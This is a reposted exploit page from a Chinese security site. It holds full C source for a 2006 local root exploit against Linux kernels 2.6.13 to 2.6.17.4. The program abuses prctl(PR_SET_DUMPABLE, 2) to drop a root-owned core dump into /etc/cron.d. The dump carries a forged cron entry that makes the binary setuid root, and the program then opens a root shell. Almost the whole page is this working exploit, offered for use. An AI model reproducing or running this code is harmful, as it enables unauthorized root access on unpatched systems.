首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Linux Kernel 2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (2)
来源:vfocus.net 作者:Julien 发布时间:2006-07-13  

/* Linux >= 2.6.13 prctl kernel exploit
*
* (C) Julien TINNES
*
* If you read the Changelog from 2.6.13 you've probably seen:
* [PATCH] setuid core dump
*
* This patch mainly adds suidsafe to suid_dumpable sysctl but also a new per process,
* user setable argument to PR_SET_DUMPABLE.
*
* This flaw allows us to create a root owned coredump into any directory.
* This is trivially exploitable.
*
*/

#include <sys/types.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <sys/prctl.h>
#include <unistd.h>
#include <stdio.h>
#include <errno.h>
#include <signal.h>
#include <stdlib.h>
#include <time.h>

#define CROND "/etc/cron.d"
#define BUFSIZE 2048


struct rlimit myrlimit={RLIM_INFINITY, RLIM_INFINITY};

char crontemplate[]=
"#/etc/cron.d/core suid_dumpable exploit\n"
"SHELL=/bin/sh\n"
"PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n"
"#%s* * * * * root chown root:root %s && chmod 4755 %s && rm -rf %s && kill -USR1 %d\n";

char cronstring[BUFSIZE];
char fname[BUFSIZE];

struct timeval te;

void sh(int sn) {
execl(fname, fname, (char *) NULL);
}

int main(int argc, char *argv[]) {

int nw, pid;

if (geteuid() == 0) {
printf("[+] getting root shell\n");
setuid(0);
setgid(0);
if (execl("/bin/sh", "/bin/sh", (char *) NULL)) {
perror("[-] execle");
return 1;
}
}

printf("\nprctl() suidsafe exploit\n\n(C) Julien TINNES\n\n");

/* get our file name */
if (readlink("/proc/self/exe", fname, sizeof(fname)) == -1) {
perror("[-] readlink");
printf("This is not fatal, rewrite the exploit\n");
}

if (signal(SIGUSR1, sh) == SIG_ERR) {
perror("[-] signal");
return 1;
}
printf("[+] Installed signal handler\n");

/* Let us create core files */
setrlimit(RLIMIT_CORE, &myrlimit);
if (chdir(CROND) == -1) {
perror("[-] chdir");
return 1;
}

/* exploit the flaw */
if (prctl(PR_SET_DUMPABLE, 2) == -1) {
perror("[-] prtctl");
printf("Is you kernel version >= 2.6.13 ?\n");
return 1;
}

printf("[+] We are suidsafe dumpable!\n");

/* Forge the string for our core dump */
nw=snprintf(cronstring, sizeof(cronstring), crontemplate, "\n", fname, fname, CROND"/core", getpid());
if (nw >= sizeof(cronstring)) {
printf("[-] cronstring is too small\n");
return 1;
}
printf("[+] Malicious string forged\n");

if ((pid=fork()) == -1) {
perror("[-] fork");
return 1;
}

if (pid == 0) {
/* This is not the good way to do it ;) */
sleep(120);
exit(0);
}

/* SEGFAULT the child */
printf("[+] Segfaulting child\n");
if (kill(pid, 11) == -1) {
perror("[-] kill");
return 1;
}
if (gettimeofday(&te, NULL) == 0)
printf("[+] Waiting for exploit to succeed (~%ld seconds)\n", 60 - (te.tv_sec%60));
sleep(120);

printf("[-] It looks like the exploit failed\n");

return 1;
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Linux Kernel 2.6.13 <= 2.6.
·Linux Kernel 2.6.13 <= 2.6.
·EJ3 TOPo 2.2 (descripcion) Rem
·phpBB 3 (memberlist.php) Remot
·SipXtapi SIP Remote Buffer Ove
·Invision Power Board 2.1 <=
·Microsoft Word 2000/2003 Hlink
·Linux Kernel 2.6.13 <= 2.6.
·Ottoman CMS <= 1.1.3 (defau
·MyBulletinBoard (MyBB) <= 1
·Webmin < 1.290 / Usermin &l
·Linux Kernel <= 2.6.17.4 (/
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved